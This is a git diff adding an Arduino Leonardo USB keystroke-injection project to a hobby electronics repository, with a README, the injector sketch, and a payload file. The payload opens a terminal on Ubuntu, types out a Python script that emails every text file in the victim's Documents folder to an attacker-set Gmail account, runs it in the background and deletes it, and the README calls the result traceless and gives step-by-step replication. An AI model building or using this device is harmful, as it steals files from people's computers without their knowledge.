diff --git a/.gitignore b/.gitignore index f805e81..018b645 100644 --- a/.gitignore +++ b/.gitignore @@ -1,3 +1,5 @@ +\.idea +*.pyc # Object files *.o *.ko diff --git a/README.md b/README.md index 1c1b166..5804db0 100644 --- a/README.md +++ b/README.md @@ -3,7 +3,7 @@ ### TextMotorCommandsInterpretter Given a string command representing coordonates for X, Y axys, the library transforms -those on percentage of power for a two motor robor/car. +those on percentage of power for a two motor robot/car. For the X (direction) between -50 and 50, and Y (power) between -50 and 50 @@ -37,4 +37,89 @@ boolean direction motorCommandsInterpretter.getDirection(); // percentLeftMotor will be 0.17 // percentRightMotor will be 0.32 // direction will be true -```` \ No newline at end of file +```` + +# Projects + +## neopixel_ring_gyroscope + +Full turorial here: https://www.instructables.com/id/Gyroscope-Fun-With-Neopixel-Ring/ + +![ifttt.png](https://github.com/danionescu0/arduino/blob/master/projects/neopixel_ring_gyroscope/sketch_bb.png) + +## keyboard_exploit + +In this project i'm using an arduino leonardo to simulate a possible USB attack using HID +(humain interface device). + + +**Important!: You can defend against this kind of attack by:** + +* disabling USB ports + +* locking your computer when your're away + +The arduino leonardo can act like a keyboard and mouse, so the attack will be mounted like this: + +**Components:** +* arduino leonardo +* usb cable +* micro usb card reader +* sd card +* push button +* male-female, female-female jumper cables + +**How will the attack work:** + +1. When the button is pressed, the leonardo will read the sd card using a sd card reader. +A special file containg keys and key combination will be present on the card. +The file name is "hack.txt". + +The file can contain raw text, and it will passed to the keyboard just as it is. + +Also it can contain special commands like "Sleep::" and "Command::". + +A line like: +```` +Sleep::200 +```` +means a sleep of 200 ms + +A line like: +```` +Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t +```` +means left ctrl pressed, left alt pressed, t pressed and all released + +You can check all special keys here: https://www.arduino.cc/en/Reference/KeyboardModifiers + +2. Leonardo will read line by line, and interpret the commands and emulate the keys on the keyboard + +My "hack.py" contains a combination of keys that does the following (for UBUNTU linux): + +a. opens a terminal +b. opens a python file for creation using vi +c. writes a python script inside that collects all text files inside of documents home folder + and sends them over to a specified gmail address +d. runs the file in the background +e. deletes the file +f. closes the terminal + +This whole thing runs in a few seconds and doesn't leave traces. + +**To replicate the project:** + +a. assemble the arduino leonardo: +connect the button to digital pin 8, connect the card reader and the usb cable +b. edit the hack.txt file and modify the following lines with email and passwords: +```` +smtp_user = 'sender_email_address' +smtp_pass = 'password' +to_address = 'receiver_email_address' +```` +c. format the sd card using fat16 or fat32 +e. copy the hack.txt file +e. ensure you have a test txt file in the Documents folder on your computer +f. plug the arduiono and press the button + + diff --git a/projects/keyboard_exploit/hack.py b/projects/keyboard_exploit/hack.py new file mode 100644 index 0000000..783d8a3 --- /dev/null +++ b/projects/keyboard_exploit/hack.py @@ -0,0 +1,41 @@ +import smtplib +import glob, os +from email.MIMEMultipart import MIMEMultipart +from email.MIMEBase import MIMEBase +from email.MIMEText import MIMEText +from email.Utils import COMMASPACE, formatdate +from email import Encoders + +smtp_user = 'sender_email_addr' +smtp_pass = 'sender_password' +to_address = 'receiver_address' +scan_documents_location = '~/Documents/' +from_address = smtp_user + +subject = body = 'Files from hacked computer' +header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n' + +def sendMail(to, subject, text, files=[]): + msg = MIMEMultipart() + msg['From'] = smtp_user + msg['To'] = COMMASPACE.join(to) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + msg.attach( MIMEText(text) ) + for file in files: + part = MIMEBase('application', "octet-stream") + part.set_payload( open(file,"rb").read() ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' + % os.path.basename(file)) + msg.attach(part) + + server = smtplib.SMTP('smtp.gmail.com:587') + server.ehlo_or_helo_if_needed() + server.starttls() + server.ehlo_or_helo_if_needed() + server.login(smtp_user, smtp_pass) + server.sendmail(smtp_user, to, msg.as_string()) + server.quit() + +sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location))) \ No newline at end of file diff --git a/projects/keyboard_exploit/hack.txt b/projects/keyboard_exploit/hack.txt new file mode 100644 index 0000000..29f8124 --- /dev/null +++ b/projects/keyboard_exploit/hack.txt @@ -0,0 +1,56 @@ +Command::KEY_LEFT_CTRL,KEY_LEFT_ALT,t +Sleep::200 +vi hack.py +Sleep::200 +Command::KEY_INSERT +import smtplib +import glob, os +from email.MIMEMultipart import MIMEMultipart +from email.MIMEBase import MIMEBase +from email.MIMEText import MIMEText +from email.Utils import COMMASPACE, formatdate +from email import Encoders + +smtp_user = 'sender_email_addr' +smtp_pass = 'sender_password' +to_address = 'receiver_address' +scan_documents_location = '~/Documents/' +from_address = smtp_user + +subject = body = 'Files from hacked computer' +header = 'To :' + to_address + '\n' + 'From : ' + from_address + '\n' + 'Subject : ' + subject + '\n' + +def sendMail(to, subject, text, files=[]): + msg = MIMEMultipart() + msg['From'] = smtp_user + msg['To'] = COMMASPACE.join(to) + msg['Date'] = formatdate(localtime=True) + msg['Subject'] = subject + msg.attach( MIMEText(text) ) + for file in files: + part = MIMEBase('application', "octet-stream") + part.set_payload( open(file,"rb").read() ) + Encoders.encode_base64(part) + part.add_header('Content-Disposition', 'attachment; filename="%s"' + % os.path.basename(file)) + msg.attach(part) + + server = smtplib.SMTP('smtp.gmail.com:587') + server.ehlo_or_helo_if_needed() + server.starttls() + server.ehlo_or_helo_if_needed() + server.login(smtp_user, smtp_pass) + server.sendmail(smtp_user, to, msg.as_string()) + server.quit() + +sendMail([to_address], subject, body, glob.glob("{0}/*.*txt".format(scan_documents_location))) +Sleep::50 +Command::KEY_ESC +Sleep::100 +:x +Sleep::200 +nohup python hack.py & +Sleep::500 +rm -rf hack.py +Sleep::200 +Command::KEY_LEFT_ALT,KEY_F4 \ No newline at end of file diff --git a/projects/keyboard_exploit/keyboard_exploit.ino b/projects/keyboard_exploit/keyboard_exploit.ino new file mode 100644 index 0000000..163b61f --- /dev/null +++ b/projects/keyboard_exploit/keyboard_exploit.ino @@ -0,0 +1,131 @@ +#include "Keyboard.h" +#include +#include + +String filenameOnCard = "hack.txt"; +String sleepCommandStartingPoint = "Sleep::"; +String commandStartingPoint = "Command::"; +int delayBetweenCommands = 10; +const int buttonPin = 8; +const int chipSelect = 10; +int previousButtonState = HIGH; + +void setup() { + pinMode(buttonPin, INPUT); + Serial.begin(9600); + Keyboard.begin(); + if (!SD.begin(chipSelect)) { + Serial.println("Card failed, or not present!"); + return; + } +} + +void loop() { + int buttonState = digitalRead(buttonPin); + if ((buttonState != previousButtonState) && (buttonState == HIGH)) { + sdFileToKeyboard(); + Serial.println("Uploaded!"); + delay(500); + } + previousButtonState = buttonState; +} + +void sdFileToKeyboard() { + File dataFile = SD.open(filenameOnCard); + if (!dataFile) { + Serial.println("The specified filename is not present on SD card, check filenameOnCard !"); + } + String line; + while (dataFile.available()) { + line = dataFile.readStringUntil('\n'); + Serial.println(line); + sendToKeyboard(line); + } + dataFile.close(); +} + +void sendToKeyboard(String line) { + String workingLine = line; + if (workingLine.indexOf(sleepCommandStartingPoint) != -1) { + sleepFor(line); + return; + } + if (workingLine.indexOf(commandStartingPoint) == -1) { + Serial.print("Text:");Serial.println(line); + Keyboard.println(line); + pressEnter(); + return; + } + + Serial.println("Command:"); + int charPosition = commandStartingPoint.length(); + int lineLength = line.length(); + workingLine += ","; + + while (workingLine != "") { + workingLine = workingLine.substring(charPosition); + Serial.print("WorkingLine:");Serial.println(workingLine); + int specialCommandDelimiterPosition = workingLine.indexOf(","); + String command = workingLine.substring(0, specialCommandDelimiterPosition); + charPosition = specialCommandDelimiterPosition + 1; + if (command != "") { + Serial.print("Command found:");Serial.println(command); + Keyboard.press(getCommandCode(command)); + delay(delayBetweenCommands); + } + } + Keyboard.releaseAll(); + delay(delayBetweenCommands); +} + +void pressEnter() { + Keyboard.press(KEY_RETURN); + Keyboard.releaseAll(); +} + +void sleepFor(String line) { + int sleepAmount = line.substring(sleepCommandStartingPoint.length(), line.length()).toInt(); + Serial.print("Sleeping for:");Serial.println(sleepAmount); + delay(sleepAmount); +} + +char getCommandCode(String text) { + char textCharacters[2]; + text.toCharArray(textCharacters, 2); + char code = textCharacters[0]; + + code = (text == "KEY_LEFT_CTRL") ? KEY_LEFT_CTRL : code; + code = (text == "KEY_LEFT_SHIFT") ? KEY_LEFT_SHIFT : code; + code = (text == "KEY_LEFT_ALT") ? KEY_LEFT_ALT : code; + code = (text == "KEY_UP_ARROW") ? KEY_UP_ARROW : code; + code = (text == "KEY_DOWN_ARROW") ? KEY_DOWN_ARROW : code; + code = (text == "KEY_LEFT_ARROW") ? KEY_LEFT_ARROW : code; + code = (text == "KEY_RIGHT_ARROW") ? KEY_RIGHT_ARROW : code; + code = (text == "KEY_RIGHT_GUI") ? KEY_RIGHT_GUI : code; + code = (text == "KEY_BACKSPACE") ? KEY_BACKSPACE : code; + code = (text == "KEY_TAB") ? KEY_TAB : code; + code = (text == "KEY_RETURN") ? KEY_RETURN : code; + code = (text == "KEY_ESC") ? KEY_ESC : code; + code = (text == "KEY_INSERT") ? KEY_INSERT : code; + code = (text == "KEY_DELETE") ? KEY_DELETE : code; + code = (text == "KEY_PAGE_UP") ? KEY_PAGE_UP : code; + code = (text == "KEY_PAGE_DOWN") ? KEY_PAGE_DOWN : code; + code = (text == "KEY_HOME") ? KEY_HOME : code; + code = (text == "KEY_END") ? KEY_END : code; + code = (text == "KEY_CAPS_LOCK") ? KEY_CAPS_LOCK : code; + code = (text == "KEY_F1") ? KEY_F1 : code; + code = (text == "KEY_F2") ? KEY_F2 : code; + code = (text == "KEY_F3") ? KEY_F3 : code; + code = (text == "KEY_F4") ? KEY_F4 : code; + code = (text == "KEY_F5") ? KEY_F5 : code; + code = (text == "KEY_F6") ? KEY_F6 : code; + code = (text == "KEY_F7") ? KEY_F7 : code; + code = (text == "KEY_F8") ? KEY_F8 : code; + code = (text == "KEY_F9") ? KEY_F9 : code; + code = (text == "KEY_F10") ? KEY_F10 : code; + code = (text == "KEY_F11") ? KEY_F1 : code; + code = (text == "KEY_F12") ? KEY_F2 : code; + + return code; +} + diff --git a/projects/neopixel_ring_gyroscope/sketch.fzz b/projects/neopixel_ring_gyroscope/sketch.fzz new file mode 100644 index 0000000..f1d5a78 Binary files /dev/null and b/projects/neopixel_ring_gyroscope/sketch.fzz differ diff --git a/projects/neopixel_ring_gyroscope/sketch_bb.png b/projects/neopixel_ring_gyroscope/sketch_bb.png new file mode 100644 index 0000000..3a7a026 Binary files /dev/null and b/projects/neopixel_ring_gyroscope/sketch_bb.png differ